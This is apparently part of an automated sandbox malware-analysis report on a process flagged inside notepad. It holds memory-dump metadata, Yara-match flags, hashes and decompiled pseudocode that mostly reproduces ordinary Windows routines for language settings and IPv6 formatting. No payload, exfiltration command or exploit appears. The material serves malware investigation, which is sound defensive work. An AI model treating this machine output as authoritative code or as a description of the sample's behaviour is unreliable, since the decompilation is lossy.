                                                  0x00407b46
                                                  0x00407b47
                                                  0x00407b48
                                                  0x00407b4a
                                                  0x00407b4a
                                                  0x00407b4c
                                                  0x00407b4d
                                                  0x00407b1b
                                                  0x00407b1d
                                                  0x00407b1f
                                                  0x00407b26
                                                  0x00407b3a
                                                  0x00407b4f
                                                  0x00407b4f
                                                  0x00407b51
                                                  0x00407b53
                                                  0x00407b56
                                                  0x00407b5a
                                                  0x00407b67
                                                  0x00407b6d
                                                  0x00407b6e
                                                  0x00407b6f
                                                  0x00407b72
                                                  0x00407b78
                                                  0x00407b7d
                                                  0x00407b83
                                                  0x00407b87
                                                  0x00407b8b
                                                  0x00407b93
                                                  0x00407b98
                                                  0x00407b9d
                                                  0x00407ba9
                                                  0x00407bae
                                                  0x00407bba
                                                  0x00407bc4
                                                  0x00407bcb
                                                  0x00407bd2
                                                  0x00407bd9
                                                  0x00407be0
                                                  0x00407be7
                                                  0x00407bee
                                                  0x00407bf5
                                                  0x00407bfc
                                                  0x00407c00
                                                  0x00407c03
                                                  0x00407c06
                                                  0x00407c0a
                                                  0x00407c13
                                                  0x00407c18
                                                  0x00407c27
                                                  0x00407c30
                                                  0x00407c37
                                                  0x00407c3e
                                                  0x00407c45
                                                  0x00407c4c
                                                  0x00407c51
                                                  0x00407c51
                                                  0x00407c1a
                                                  0x00407c1c
                                                  0x00407c1c
                                                  0x00407c5a
                                                  0x00407c61
                                                  0x00407c6d
                                                  0x00407c76
                                                  0x00407c82
                                                  0x00407c8e
                                                  0x00407c94
                                                  0x00407c99
                                                  0x00407ca2
                                                  0x00407cb8
                                                  0x00407cc0
                                                  0x00407cc0
                                                  0x00407cca
                                                  0x00407ccc
                                                  0x00407cd0
                                                  0x00407cd0

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: C$a$b$d$i
                                                  • API String ID: 0-2334916691
                                                  • Opcode ID: 39fe6d663443100bf131b374ccb7f297ebea0d292b020008afe9c480943b156c
                                                  • Instruction ID: 997cc09fd66991c7798b4a6b172579768033c67ab25b2bee35c7713674c99300
                                                  • Opcode Fuzzy Hash: 39fe6d663443100bf131b374ccb7f297ebea0d292b020008afe9c480943b156c
                                                  • Instruction Fuzzy Hash: 4141D3B1E44208ABE710DBA5DC82BEEB7B9EF45308F00452EE509A7242D779694187A9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AB26F8 Relevance: .0, Instructions: 44COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                  • Instruction ID: 96df40c62202c1877907e345d483c56a0a8563335f27916598f1eb5986c55130
                                                  • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                  • Instruction Fuzzy Hash: EFF022307240499BDB09EB189D51BBA33E9EB94701F54C03AED49C7247EA31DD808394
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00407B1C Relevance: .0, Instructions: 15COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f7d11924b4d6243b8848bb8234bc3352aec8212ccffc58f94096e7f6bda49254
                                                  • Instruction ID: fcb057e5851fda7140be7754e97014f2b8c2e91b8136914f25ffb53c0e617e36
                                                  • Opcode Fuzzy Hash: f7d11924b4d6243b8848bb8234bc3352aec8212ccffc58f94096e7f6bda49254
                                                  • Instruction Fuzzy Hash: 1BC09B67E9905431D534684DBC532B4E76DE357138F157777EC09FB5505092C4E101DD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040E47A Relevance: .0, Instructions: 13COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0040E47A(void* __ebx, void* __edx) {

				return  *0x8a58f176 & 0xe0bc6015;
			}



                                                  0x0040e490

                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 27b23560c617c8e4a14069ad948cc113376db82bc51ee8352848c52f3c5082c3
                                                  • Instruction ID: 4dfa375f4530153acd539587ef97e4baa72d458abee132717f89c92c527b70b7
                                                  • Opcode Fuzzy Hash: 27b23560c617c8e4a14069ad948cc113376db82bc51ee8352848c52f3c5082c3
                                                  • Instruction Fuzzy Hash: A7B0125BF460540585124D69F8813F1F7B4D58F132EC832E3CD5DF74025003C426959D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AC8788 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 94%
                                                  			E00AC8788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00AC8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E00AAE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E00AC718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00AC8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E00AAE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E00AC718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00AC8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00AC8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00AC8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E00AAE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E00AAE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E00AC718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E00AAE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E00AA2340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E00ABE679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E00AAE2A8(_t322,  &_v68, _v16);
								if(E00AC5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E00ABE679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E00AAE2A8(_t322,  &_v68, _t236);
								if(E00AC5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E00AAE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E00AAE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E00AC718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E00AAE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E00AA2340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E00ABE679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E00AAE2A8(_v12,  &_v68, _v16);
							if(E00AC5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E00ABE679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E00AAE2A8(_t322,  &_v68, _t269);
							if(E00AC5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E00AAE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E00AAE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E00AC718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E00AAE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E00AA2340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E00ABE679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E00AAE2A8(_v12,  &_v68, _v16);
						if(E00AC5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E00ABE679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E00AAE2A8(_t322,  &_v68, _t296);
						if(E00AC5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E00AAE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E00AAE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                  0x00ac8788
                                                  0x00ac8788
                                                  0x00ac8791
                                                  0x00ac8794
                                                  0x00ac8798
                                                  0x00ac879b
                                                  0x00ac879e
                                                  0x00ac87a1
                                                  0x00ac87a4
                                                  0x00ac87a7
                                                  0x00ac87aa
                                                  0x00ac87af
                                                  0x00b11ad3
                                                  0x00ac8b0a
                                                  0x00ac8b0d
                                                  0x00ac8b13
                                                  0x00ac8b19
                                                  0x00ac8b1f
                                                  0x00ac8b25
                                                  0x00ac8b2b
                                                  0x00ac8b31
                                                  0x00ac8b37
                                                  0x00ac8b3d
                                                  0x00ac8b46
                                                  0x00ac8b46
                                                  0x00ac87c6
                                                  0x00ac87d0
                                                  0x00b11ae0
                                                  0x00b11ae6
                                                  0x00b11af8
                                                  0x00b11af8
                                                  0x00b11afd
                                                  0x00b11afe
                                                  0x00b11b01
                                                  0x00b11b06
                                                  0x00b11b06
                                                  0x00ac87d6
                                                  0x00ac87f2
                                                  0x00ac87f7
                                                  0x00ac8807
                                                  0x00ac880a
                                                  0x00ac880f
                                                  0x00ac8810
                                                  0x00ac8813
                                                  0x00ac8818
                                                  0x00ac8818
                                                  0x00ac882c
                                                  0x00ac8831
                                                  0x00ac8838
                                                  0x00ac8908
                                                  0x00ac8920
                                                  0x00ac89f0
                                                  0x00ac8a08
                                                  0x00ac8af6
                                                  0x00ac8af6
                                                  0x00ac8af8
                                                  0x00ac8afb
                                                  0x00b11beb
                                                  0x00b11beb
                                                  0x00ac8b04
                                                  0x00b11bf8
                                                  0x00b11c0e
                                                  0x00b11c13
                                                  0x00b11c16
                                                  0x00b11c16
                                                  0x00b11bf8
                                                  0x00000000
                                                  0x00ac8b04
                                                  0x00ac8a0e
                                                  0x00ac8a11
                                                  0x00ac8a14
                                                  0x00ac8a15
                                                  0x00ac8a18
                                                  0x00ac8a22
                                                  0x00ac8b59
                                                  0x00ac8a28
                                                  0x00ac8a3c
                                                  0x00ac8a3c
                                                  0x00ac8a42
                                                  0x00b11bb0
                                                  0x00b11b11
                                                  0x00b11b11
                                                  0x00000000
                                                  0x00ac8a48
                                                  0x00ac8a51
                                                  0x00ac8a5b
                                                  0x00ac8a5e
                                                  0x00ac8a61
                                                  0x00ac8a69
                                                  0x00ac8a69
                                                  0x00ac8a6d
                                                  0x00000000
                                                  0x00000000
                                                  0x00ac8a74
                                                  0x00ac8a7c
                                                  0x00ac8a7d
                                                  0x00ac8a91
                                                  0x00ac8a93
                                                  0x00ac8a93
                                                  0x00ac8a98
                                                  0x00ac8a9b
                                                  0x00ac8aa1
                                                  0x00ac8aa1
                                                  0x00ac8aa4
                                                  0x00ac8aaa
                                                  0x00ac8ab1
                                                  0x00ac8ac5
                                                  0x00ac8ac7
                                                  0x00ac8ac7
                                                  0x00ac8ac5
                                                  0x00ac8ace
                                                  0x00b11bc9
                                                  0x00b11bce
                                                  0x00b11bd2
                                                  0x00b11bd2
                                                  0x00ac8ad8
                                                  0x00ac8aeb
                                                  0x00ac8aeb
                                                  0x00ac8af0
                                                  0x00ac8af4
                                                  0x00000000
                                                  0x00ac8af4
                                                  0x00ac8a42
                                                  0x00ac8926
                                                  0x00ac8929
                                                  0x00ac892c
                                                  0x00ac892d
                                                  0x00ac8930
                                                  0x00ac8935
                                                  0x00ac893a
                                                  0x00ac8b51
                                                  0x00ac8940
                                                  0x00ac8954
                                                  0x00ac8954
                                                  0x00ac895a
                                                  0x00b11b63
                                                  0x00000000
                                                  0x00ac8960
                                                  0x00ac8969
                                                  0x00ac8973
                                                  0x00ac8976
                                                  0x00ac8979
                                                  0x00ac897e
                                                  0x00ac8981
                                                  0x00ac8981
                                                  0x00ac8986
                                                  0x00000000
                                                  0x00000000
                                                  0x00b11b6e
                                                  0x00b11b74
                                                  0x00b11b7b
                                                  0x00b11b8f
                                                  0x00b11b91
                                                  0x00b11b91
                                                  0x00b11b99
                                                  0x00b11b9c
                                                  0x00b11ba2
                                                  0x00b11ba2
                                                  0x00ac898c
                                                  0x00ac8992
                                                  0x00ac8999
                                                  0x00ac89ad
                                                  0x00b11ba8
                                                  0x00b11ba8
                                                  0x00ac89ad
                                                  0x00ac89b6
                                                  0x00ac89c8
                                                  0x00ac89cd
                                                  0x00ac89d0
                                                  0x00ac89d0
                                                  0x00ac89d6
                                                  0x00ac89e8
                                                  0x00ac89e8
                                                  0x00ac89ed
                                                  0x00000000
                                                  0x00ac89ed
                                                  0x00ac895a
                                                  0x00ac883e
                                                  0x00ac8841
                                                  0x00ac8844
                                                  0x00ac8845
                                                  0x00ac8848
                                                  0x00ac884d
                                                  0x00ac8852
                                                  0x00ac8b49
                                                  0x00ac8858
                                                  0x00ac886c
                                                  0x00ac886c
                                                  0x00ac8872
                                                  0x00b11b0e
                                                  0x00000000
                                                  0x00ac8878
                                                  0x00ac8881
                                                  0x00ac888b
                                                  0x00ac888e
                                                  0x00ac8891
                                                  0x00ac8896
                                                  0x00ac8899
                                                  0x00ac8899
                                                  0x00ac889e
                                                  0x00000000
                                                  0x00000000
                                                  0x00b11b21
                                                  0x00b11b27
                                                  0x00b11b2e
                                                  0x00b11b42
                                                  0x00b11b44
                                                  0x00b11b44
                                                  0x00b11b4c
                                                  0x00b11b4f
                                                  0x00b11b55
                                                  0x00b11b55
                                                  0x00ac88a4
                                                  0x00ac88aa
                                                  0x00ac88b1
                                                  0x00ac88c5
                                                  0x00b11b5b
                                                  0x00b11b5b
                                                  0x00ac88c5
                                                  0x00ac88ce
                                                  0x00ac88e0
                                                  0x00ac88e5
                                                  0x00ac88e8
                                                  0x00ac88e8
                                                  0x00ac88ee
                                                  0x00ac8900
                                                  0x00ac8900
                                                  0x00ac8905
                                                  0x00000000
                                                  0x00ac8905

                                                  APIs
                                                  Strings
                                                  • Kernel-MUI-Language-Disallowed, xrefs: 00AC8914
                                                  • Kernel-MUI-Number-Allowed, xrefs: 00AC87E6
                                                  • Kernel-MUI-Language-Allowed, xrefs: 00AC8827
                                                  • Kernel-MUI-Language-SKU, xrefs: 00AC89FC
                                                  • WindowsExcludedProcs, xrefs: 00AC87C1
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: _wcspbrk
                                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                  • API String ID: 402402107-258546922
                                                  • Opcode ID: d70ccf11c896523ec9ed58ab43945f0a38c7865444df3c09bc0e6bea2c32c3f7
                                                  • Instruction ID: 67c14371bfe66c00eee747b181be6ec240e7c0b789b7cb5d07730c6648092c40
                                                  • Opcode Fuzzy Hash: d70ccf11c896523ec9ed58ab43945f0a38c7865444df3c09bc0e6bea2c32c3f7
                                                  • Instruction Fuzzy Hash: A4F1C6B2D00209EFCF11DF99CA81EEEB7B9FF08300F15446AE605A7251EB359A45DB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AE13CB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 38%
                                                  			E00AE13CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E00AD7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0xaa2926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E00AD7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0xaa9cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E00AD7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E00AD7707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E00AD7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E00AD7707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                  0x00ae13d5
                                                  0x00ae13d9
                                                  0x00ae13dc
                                                  0x00ae13de
                                                  0x00ae13e1
                                                  0x00ae13e8
                                                  0x00ae13ee
                                                  0x00b0e8fd
                                                  0x00000000
                                                  0x00b0e921
                                                  0x00b0e921
                                                  0x00b0e928
                                                  0x00b0e982
                                                  0x00b0e98a
                                                  0x00000000
                                                  0x00b0e99a
                                                  0x00b0e99e
                                                  0x00b0e9a3
                                                  0x00b0e9a8
                                                  0x00b0e9b9
                                                  0x00b0e978
                                                  0x00000000
                                                  0x00b0e978
                                                  0x00b0e98a
                                                  0x00b0e92a
                                                  0x00b0e931
                                                  0x00b0e944
                                                  0x00b0e944
                                                  0x00b0e950
                                                  0x00b0e954
                                                  0x00b0e959
                                                  0x00b0e95e
                                                  0x00b0e963
                                                  0x00b0e970
                                                  0x00000000
                                                  0x00b0e975
                                                  0x00b0e93b
                                                  0x00b0e980
                                                  0x00000000
                                                  0x00b0e980
                                                  0x00b0e942
                                                  0x00b0e94b
                                                  0x00000000
                                                  0x00b0e94b
                                                  0x00000000
                                                  0x00b0e942
                                                  0x00ae13f4
                                                  0x00ae13f4
                                                  0x00ae13f9
                                                  0x00ae13fc
                                                  0x00ae13ff
                                                  0x00ae1406
                                                  0x00b0e9cc
                                                  0x00b0e9d2
                                                  0x00b0e9d2
                                                  0x00b0e9cc
                                                  0x00ae140c
                                                  0x00ae1411
                                                  0x00ae1431
                                                  0x00ae143a
                                                  0x00ae143c
                                                  0x00ae143f
                                                  0x00ae143f
                                                  0x00ae1442
                                                  0x00ae1447
                                                  0x00ae14a8
                                                  0x00ae14ac
                                                  0x00b0e9e2
                                                  0x00b0e9e7
                                                  0x00b0e9ec
                                                  0x00b0ea05
                                                  0x00b0ea05
                                                  0x00000000
                                                  0x00ae1449
                                                  0x00000000
                                                  0x00ae1449
                                                  0x00ae144c
                                                  0x00ae1459
                                                  0x00ae1462
                                                  0x00ae1469
                                                  0x00ae146a
                                                  0x00ae1470
                                                  0x00ae1473
                                                  0x00ae1476
                                                  0x00ae1476
                                                  0x00ae1490
                                                  0x00ae1495
                                                  0x00ae138e
                                                  0x00ae1390
                                                  0x00ae1397
                                                  0x00ae1398
                                                  0x00ae1399
                                                  0x00ae13a1
                                                  0x00ae13a4
                                                  0x00ae13a4
                                                  0x00ae1498
                                                  0x00ae149c
                                                  0x00ae149f
                                                  0x00ae14a2
                                                  0x00000000
                                                  0x00000000
                                                  0x00ae14a4
                                                  0x00000000
                                                  0x00ae14a4
                                                  0x00ae1413
                                                  0x00ae1415
                                                  0x00ae1416
                                                  0x00ae1419
                                                  0x00ae141c
                                                  0x00ae1422
                                                  0x00ae13b7
                                                  0x00ae13bc
                                                  0x00ae13bf
                                                  0x00ae13bf
                                                  0x00ae13c2
                                                  0x00ae1424
                                                  0x00ae1424
                                                  0x00ae1424
                                                  0x00ae1427
                                                  0x00ae142b
                                                  0x00ae142c
                                                  0x00ae142c
                                                  0x00ae142c
                                                  0x00000000
                                                  0x00ae141c
                                                  0x00ae1411

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
